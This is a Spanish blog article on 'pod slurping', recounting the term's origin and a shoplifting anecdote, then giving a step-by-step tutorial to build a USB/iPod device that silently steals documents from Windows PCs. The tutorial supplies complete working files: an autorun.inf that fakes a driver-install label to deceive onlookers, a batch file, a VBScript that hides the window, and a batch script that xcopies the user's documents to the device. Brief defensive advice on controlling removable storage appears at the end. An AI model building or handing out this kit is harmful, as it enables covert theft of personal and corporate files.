Qué es un ataque de ‘pod slurping’ y cómo generarlo

iPod

iPod

El mundo del hacking es apasionante y cada día nos ofrece nuevas técnicas para explotar agujeros de seguridad en los diversos sistemas informáticos. El pod slurping no es nada nuevo, pero por aquí nos encanta porque está diseñado de una manera tan ingeniosa que recuerda a los primitivos virus de macro, que únicamente se servían de las características propias del sistema operativo (y de un poquito de ingeniería social) para acceder hasta la cocina de las entretelas del aparato.

El experto estadounidense en seguridad informática Abe Usher utilizó el término pod slurping por primera vez hace, más o menos, cinco años. Con él describe cómo los reproductores de MP3, tales como el iPod, y otros dispositivos de almacenamiento masivo USB pueden ser utilizados fácilmente para robar información confidencial corporativa en una empresa. Y todo ello de manera muy simple: conectándolo al ordenador víctima y dejándolo actuar, de manera sutil y disimulada.

Para demostrar esta vulnerabilidad en la seguridad de cualquier empresa, Usher desarrolló una prueba de concepto con la ayuda de una aplicación software que podía buscar, automáticamente, información crítica en las redes corporativas para luego copiarla dentro de un iPod de Apple. Esta aplicación corría directamente desde cualquier iPod y, al ser conectada a una computadora, podía copiar grandes volúmenes de información en cuestión de minutos.

Aquí vamos a utilizar nuestro propio software a modo de tutorial.

No hay que mirar muy lejos hacia atrás para encontrar uno de los primeros episodios de robo con este tipo de dispositivos. En febrero del año 2002, sale a la luz una historia relacionada con un iPod que se utiliza con fines ilegales. En este informe se explica que un consultor informático, llamado Kevin Webb, estaba de compras en una de las tiendas que la cadena CompUSA tiene a lo largo y ancho de EE. UU. Deambulaba por la sección de informática, cuando observó a un joven muchacho caminar hacia donde se encontraba él. El chico se acercó hasta la pantalla de un ordenador Macintosh y, en ese momento, sacó un iPod de su bolsillo, conectando su reproductor a la máquina.

Webb, intrigado por los movimientos del adolescente, se acercó por detrás de él para investigar su actividad. Para su sorpresa, el joven estaba copiándose el nuevo Office de Microsoft para uno de los primeros Mac OS X que, en aquel momento, se vendía por aproximadamente 500 dólares americanos. Se quedó observando un poco más y fue capaz de ver a este chico recopilar algunas otras aplicaciones de software más.

Asombrado por lo que acababa de presenciar, inmediatamente se acercó a un empleado para informar de lo que acababa de ocurrir, pero simplemente recibió una expresión de despiste e ignorancia por respuesta.

Desde aquel incidente se han podido recopilar muchos casos más de robo de información con el solo hecho de conectar un dispositivo USB a un ordenador, de manera subrepticia y sin que prácticamente nadie se dé cuenta. Hasta que, como hemos ya comentado, surgió la locución pod slurping, aludiendo al iPod por ser el primer dispositivo del que se tiene constancia que ha sido utilizado para esta técnica de intrusión y, también, al término anglosajón ‘slurp’ (‘sorber’ o ‘sorbo’).

Vamos ahora a la sección práctica, a ver cómo podemos explotar esta vulnerabilidad. Lo haremos sobre sistemas Windows, pues con otros que necesitan del montaje de las unidades de disco al conectarlas, podría ser un proceso algo más complicado, aunque nunca imposible. El famoso programita de Abe Usher no era otra cosa que una secuencia de comandos en Python que contenía los argumentos y atributos necesarios para llevar a cabo esta técnica en un ordenador con sistema operativo Windows.

La mayoría de los sistemas Windows tienen varias utilidades de línea de comandos integradas que podrían realizar muy fácilmente las tareas de «absorción» de información. El comando xcopy, por ejemplo, es uno de ellos y se puede encontrar hasta Windows Vista. Esta utilidad incluye cierta sintaxis muy básica y puede ofrecernos unas amplias posibilidades de éxito, algo que vamos a demostrar a continuación.

Para nuestro ejemplo necesitamos un equipo con Windows XP o Vista (cualquier versión) y, para ser fieles al origen del término pod slurping, un iPod de Apple (podemos utilizar cualquier otro medio extraíble USB). Las siguientes instrucciones describen cómo hacer uso del comando xcopy y las características de Windows para construir un dispositivo de slurping muy fácilmente.

Paso 1. Abrimos un editor de texto y escribimos las líneas siguientes para, posteriormente, guardarlas en un archivo al que llamaremos autorun.inf. Este archivo en Windows es el que se encarga de lanzar determinadas acciones o aplicaciones cuando se introduce un medio externo de almacenamiento (como ejecutar una instalación al meter un cederrón, por ejemplo).

[autorun]
open=launch.bat
action=Instalar drivers de la unidad flash USB
label=Unidad flash USB
shell\open\command=start.bat
'AutoPlay' en Windows Vista

‘AutoPlay’ en Windows Vista

Este archivito especifica que, al introducir nuestro USB en un equipo, va a lanzar automáticamente el archivo de proceso por lotes llamado start.bat (que luego crearemos). Además, incluye un pequeño engaño, medio ingeniería social, medio phishing: esos textos tras los atributos action y label especifican los literales que van a aparecer en el ‘Explorador de archivos’ y, también, en el cuadro de diálogo ‘Reproducción automática’ (‘AutoPlay‘), ese que se arranca al conectar nuestro dispositivo. Es decir, si alguien nos espía por detrás, va a creer que lo que hacemos es instalar los controladores del dispositivo.

Paso 2. Abrimos otro archivo de texto, escribimos la línea siguiente y lo guardamos como start.bat, el archivo de procesamiento por lotes mencionado antes.

wscript.exe "%~d0\script.vbs" "bkup.bat"

Este fichero batch ejecuta el motor de scripts Windows Script Host enviándole como argumento un archivo de script (script.vbs) que se encuentra en la unidad introducida y un archivo de proceso por lotes (bkup.bat) que es, a la vez, argumento del anterior. Ambos archivos los creamos a continuación.

Paso 3. En otro archivo de texto más escribimos lo que sigue y lo almacenamos como script.vbs, es decir un archivo de script en lenguaje VBScript y que interpreta directamente el motor Windows Script Host.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Esta línea crea el objeto de Windows Scripting Host en memoria para ejecutar un programa que le pasamos como argumento o parámetro.

Paso 4. Un último archivo deberá contener las líneas siguientes, las que se corresponden con el último batch que es, realmente, el que realiza todo el proceso de pod slurping. Lo llamaremos bkup.bat.

@echo off
mkdir %~d0\%computername%
xcopy "C:\Documents and Settings\%username%\Mis Documentos"
%~d0\%computername% /s/c/q/r/h
xcopy C:\Users\%username%\Documentos %~d0\%computername% /s/c/q/r/h/g
@cls
@exit

Este último fichero crea un directorio en nuestro dispositivo USB con el nombre del equipo al que está conectado y, a continuación, copia (mediante el comando xcopy y varios parámetros modificadores) todos los documentos del usuario de Windows XP (primer xcopy) o Windows Vista (segundo xcopy) al directorio generado.

Paso 5. Y, por fin, copiamos estos cuatro archivos a nuestro iPod o USB preferido, al directorio raíz. Listo, ya tenemos nuestro dispositivo de pod slurping preparado. ¡Sólo queda probarlo!

'xcopy' equiscopiando a todo trapo

‘xcopy’ equiscopiando a todo trapo

Y luego ya sólo es cuestión de echarle imaginación, ingenio y fantasía. Por ejemplo, a partir de Windows Vista, disponíamos, a través del Kit de Recursos de Windows, del nuevo comando robocopy (o copia robusta). Esta herramienta proporciona una plétora de nuevas características de copia que incluyen capacidades para el sistema de archivos NTFS, atributos extendidos, opción de reinicio y muchas otras. Además, a partir de Windows 7, robocopy también incluye características de copia multihilo (multithreading), pues antes sólo podía realizar la copia de los archivos en orden consecutivo.

Hoy día, además, con la irrupción masiva de los teléfonos inteligentes, las aplicaciones de este ataque cada vez se vuelven más elaboradas y complejas. Pero, ¿existe alguna manera de evitarlo? Un empleado puede aparentar estar escuchando música en su iPod pero, en realidad, podría estar cargando archivos maliciosos o absorbiendo gigabytes de información valiosa para la empresa.

Una posible solución para evitar el robo de información es implementar políticas de control para el almacenamiento móvil en toda la empresa. Algunos expertos sugieren acciones convencionales como el bloqueo físico o lógico de puertos (algo muy sencillo para cualquier administrador de sistemas); otros plantean acciones más drásticas, como la prohibición del uso de este tipo de dispositivos en los lugares de trabajo. Nos sirvamos de una filosofía u otra, este no es el mejor camino que podemos tomar.

La manera ideal de asegurar el control completo sobre los dispositivos de almacenamiento portátil es mediante la introducción de barreras tecnológicas, tales como soluciones de software que permitan un control total sobre las transferencias de datos hacia y desde dispositivos de almacenamiento móvil por cada usuario en la red.

Sea como fuere, y cómo solemos decir desde estas trincheras digitales, no se pueden poner puertas al campo, y la explotación de los agujeros de seguridad de los distintos sistemas operativos seguirá siendo un hecho mañana y pasado mañana. La cuestión pasa por poner a prueba nuestra capacidad tecnológica y nuestros conocimientos para conseguir retos intelectuales cada vez más complejos e inasequibles. Ese es el desafío, porque robar información es un delito.

2 comentarios a “Qué es un ataque de ‘pod slurping’ y cómo generarlo”

Escribe tu comentario

eBook 'retroPLOF!'

retroPLOF!
Especifica tu dirección de correo electrónico y pulsa 'Comprar ahora'. Puedes pagar con tu cuenta de PayPal o con cualquier tarjeta bancaria.

E-mail envío eBook:

<script>» title=»<script>


<script>

Utilizamos cookies propias y de terceros para mejorar la experiencia de navegación. Más información.

ACEPTAR
Aviso de cookies